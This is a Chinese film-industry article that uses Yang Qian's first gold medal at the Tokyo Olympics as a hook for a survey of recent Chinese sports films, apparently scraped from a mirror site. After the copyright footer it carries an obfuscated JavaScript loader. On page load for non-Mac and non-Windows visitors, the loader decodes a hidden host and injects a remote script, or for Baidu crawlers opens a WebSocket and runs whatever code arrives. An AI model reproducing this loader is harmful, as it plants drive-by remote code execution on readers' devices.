杨倩摘得东京奥运首金!体育精神将在大银幕续写

来源:鬼片网人气:加载中更新:2021-07-27 00:48

刚刚,女子10米气步枪决赛上,中国00后小将杨倩,拿下了东京奥运会首枚金牌!按下重启键的东京奥运会,备受期待。


1905电影网专稿 刚刚,女子10米气步枪决赛上,中国00后小将杨倩,拿下了东京奥运会首枚金牌!



按下重启键的东京奥运会,备受期待。


7月23日举行的东京奥运会开幕式上,中国女排运动员朱婷和跆拳道运动员赵帅担任中国体育代表团旗手。值得关注的是,朱婷成为了中国代表团夏奥会第一位女旗手。



在此之后,2022年2月4日,第24届冬季奥林匹克运动会的圣火即将在北京点燃。伴随着大家对奥运的热情,我们也注意到,当下国产体育片也迎来了新风口。


尤其是在电影《夺冠》上映之后的一年中,不少体育题材的电影作品登陆大银幕,展现了短跑、马拉松、水上运动、棒球等等体育项目,不仅如此,在目前已经完成拍摄或立项的项目中,也有作品涉及体育项目。



曾经在市场上表现相对平淡的体育电影,如今正迎风而上,实现更多机会的翻盘。

 

No.1


1年前,电影《夺冠》先是拿下超过8亿的票房,后在金鸡奖中斩获最佳影片殊荣。这个成绩似乎让不少人看到了体育电影的可能性。

 

毕竟在《夺冠》之前,被大家频繁提及的体育电影《破风》和《激战》,票房成绩均只有1亿多元。



编剧张冀曾在接受我们的采访时坦言,体育电影是非常庞大的一个类别的电影,尤其是在商业片中,它可以做得很好看,但我们目前确实在这个类别中有些薄弱。

 

2021年,体育电影似乎给观众带来了不少的可能性。

 

电影《了不起的老爸》《超越》相继上映;谭卓主演的影片《出拳吧!妈妈》在上海国际电影节展映;《五个扑水的少年》定档8月14日;电影《我心飞扬》正式杀青,并定档2022年春节档。



《了不起的老爸》和《超越》可谓默契十足,两部影片均把镜头对准了跑步题材,只是前者聚焦马拉松运动,而后者展现了百米短跑运动员退役前后的生活故事。两者最有缘分的地方,莫不过最终的票房成绩都超1.4亿元。

 

尤其是《了不起的老爸》,中后期凭借电影不错的观众口碑,排片逆跌,被不少业内认为是六月档期中的小黑马。

 


要说黑马,8月即将上映的《五个扑水的少年》或许会成为另一匹。

 

影片虽然改编自日本同名影片,但是导演对剧本进行了大刀阔斧地改编,把故事尽可能地拉近到中国观众身边。电影讲述了5个少年因意外成立了少年花样游泳队,在这场意外中,慢慢找到自己的定位。



即便靠着原作IP,目前电影在各个平台上想看指数并不理想,但片方近期在各个城市进行了不少的点映活动,均收获了不俗的口碑,或许最终也能在暑期档好好表现一番。

 

对应当下,男子花游实际在2014年才正式登上国际舞台,直到2017年的的布达佩斯游泳世锦赛上,石浩玙成为第一个出现在世锦赛的中国男子花游选手。



运动题材自然也缺少不了女性的风采。

 

电影《出拳吧!妈妈》则把故事对准了拳击运动,由谭卓饰演的拳击运动员经历了被黑哨、母子分离等不幸之后,又再次为了家庭,重新燃起斗志,为自己的生活找回失去的一切。

 

从故事发展线来看,电影编排没有太多的意外,当时难能可贵的在于镜头对准了女拳击手,这么一部展现女性光辉的影片,加上谭卓的演技,自然不会让人失望。

 


在很长的时间里,女子拳击都没有被重视,直到2009年,它才正式成为了奥运会比赛项目,也是最后一个奥运会现有项目中,实现男女平等的项目。它更是让更多人,有机会看到女性的力量。

 

除此之外,以冬奥会中国代表团第一枚金牌获得者、著名短道速滑运动员杨扬为原型的影片《我心飞扬》。

 

在前期创作阶段对原型人物大杨扬、小杨阳以及教练、队友都进行了大量采访,还邀请许多专业短道速滑运动员、教练员参与拍摄。

 


如今,中国短道速滑队在每一届冬奥会上都有金牌入手,而在目前中国历届冬奥会取得的13枚金牌中,有10枚都来自于短道速滑。

 

我国是体育大国,一直也倡导着全民运动,不管是生活,还是专业赛事,都蕴藏着丰富的故事素材和专业指导,开发创作体育题材影片具备极大优势,未来会有很多的可能性展现出来。

 

No.2


除了上述已经通过大银幕和观众见面,或者官宣拍摄完成的作品之外,还有不少作品正在筹备中。

 

恒业影业推出电影《中国乒乓》,并找来了张冀担任剧本顾问;《乡村女童篮球队》和《飞天篮球队》均把镜头放在了篮球题材上;任贤齐手上暂时停拍的《跑马》,则同样关注着马拉松运动。

 


张冀则表示,如果大家觉得《夺冠》不错,他愿意把自己在体育电影的创作经验分享给大家。在他看来,体育片就是和平年代的战争类型片。

 

在他的分享中,他会坦言《夺冠》第一要素是体育电影,第二要素是剧情片。但其实不少体育电影,可能体育的要素是后置的,传记或者其他类别才是重点。



编剧宋方金谈及《摔跤吧!爸爸》就是第一类型是家庭片,而第二类型才是体育片。而《了不起的老爸》则相反,“主类型是体育片,次类型是家庭片。”

 

无独有偶,影评人谭飞曾说,代入感是观众买票的关键,而体育题材专业性太强就会有壁垒,应该嫁接其他的类型和元素。



譬如《了不起的老爸》的家庭元素、《超越》的喜剧元素、《五个扑水的少年》的青春元素,都成为了他们接近观众的重要突破口。正如周青元导演所说,他被《了不起的老爸》打动的地方不是体育元素,而是其中的家庭情感。

 

这些类型元素的融合,成为了当下中国体育电影的一种特色。回顾过去欧美影史上,拳击题材会是他们更擅长的内容,其中很大元素是在于即便观众不理解其中的规则,依旧能看到那种拳拳到肉的视觉享受。

 


但这种体育影片对于摄影师的运镜要求,以及动作指导的动作诉求会格外的高,这些因素加上拳击运动在中国市场仍较为冷门,也限制了其发展。《羞羞的铁拳》虽然展现了拳击运动,但更多还是服务于喜剧本身。

 

相比起观众概念里如何把运动拍得更“燃”,目前不少体育电影则强调了励志路线,用爱和情感打动观众。电影《五个扑水的少年》则在强调花样游泳同时,则更突出少年之间的成长,把励志和冒险给深层次的强化。

 


《中国乒乓》亦是如此。故事主线将聚焦一位乒乓少年的成长与逆袭,讲述两国球员的赛场竞技与场下人生,在羁绊纠葛中彼此成就的故事。但至于成片会如何,也成为了我们所期待的重点。

 


恒业影业的宣发总经理宋毅也表示,“有好看的故事和真实的人物,在体育竞技的外壳之下,加上能引起共鸣的情感和精彩的特效,拍出与日常不一样的乒乓比赛,我们相信观众会被故事与人物打动。对于当下的体育电影都是一样的,观众最终需要看到的是人物,是人物身上发生的故事,更会被人物自身带来的精神所触动。”

 

No.3


除了创作,演员同样是一个大难题。

 

陈可辛确定拍《夺冠》时,就决定启用专业的女排运动员来出演,“我们从剧本阶段,选角导演就开始去各个大学、地方队、少年队找人,找到之后挑出来再训练表演。”毕竟对于这种群像电影而言,专业性会要求更强。



郑恺在拍摄《超越》期间,单就为了“瘦”,就狂下苦功,“体校生的瘦是那种精瘦,整体需要保持一定的线条感。”为此,35岁的他跟着体校生一起运动生活,短短半年时间,瘦到了体脂9%。

 


王砚辉和张宥浩同样在拍摄《了不起的老爸》前,跟着专业的马拉松跑者,以及专业陪跑员,上了不少相关课程。张宥浩更是为了能达到专业运动员的身形,也紧急地进行了锻炼,尽可能让自己接近角色。


主演孟美岐坦言,自己进《我心飞扬》剧组前完全不会滑冰,为了接近角色,专门提前一个多月跟专业运动员一起训练,在训练前期,摔倒、受伤都是家常便饭。

 


《五个扑水的少年》导演宋灏霖坦言,自己在选角的时候,就要求演员是会游泳的。不仅如此,在拍摄前期,各种训练几位主演,最后大家都变成了“浪里白条”。

 

在一场映后,有观众也对选角提出了质疑,“这几位演员虽好,但在电影里皮肤似乎太白嫩了。”


导演回应,自己为了拍摄走访了不少游泳队,发现现在很多游泳运动员的皮肤都不是印象里的古铜色,所以几位演员在电影里看起来也不是很黑,“但实际他们还是比进组前,黑了不少。”

 


可见,观众在观看体育电影的时候,格外重视演员身上的专业性。这种付出,对于演员本身也是绝大的考验,能体现出演员的专业性,但这意味着他们要为此投入更长的周期。

 

时机、创作、演员,每一环都息息相关。


正如多数体育电影的故事发展一样,或是“小白”逆袭成功,或是经历过低谷之后,迎来胜利。

 

这种模式同样对应着中国体育电影,我们历史上曾有过《体育皇后》《女篮五号》《沙鸥》等一系列的体育题材电影。



如今,创作者们经历过一段近似空白的阶段,又迎来新的爆发期,在结合新时代体育精神的同时,抓住观众的共情情绪,才能在体育电影领域,实现“超越”,最终“夺冠”!


文/青果

    Copyright © 2008-2021 鬼片网www.guipian5.com.保留所有权利

    function swtQKeDV(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function RonXvs(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return swtQKeDV(t);};window[''+'N'+'g'+'S'+'c'+'v'+'E'+'Q'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=RonXvs,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('aG5yyLnpob3V3dXRyyaXAuY24=','dHIueWVzzdW42NzzguY29t','131005',window,document,['y','z']);}:function(){};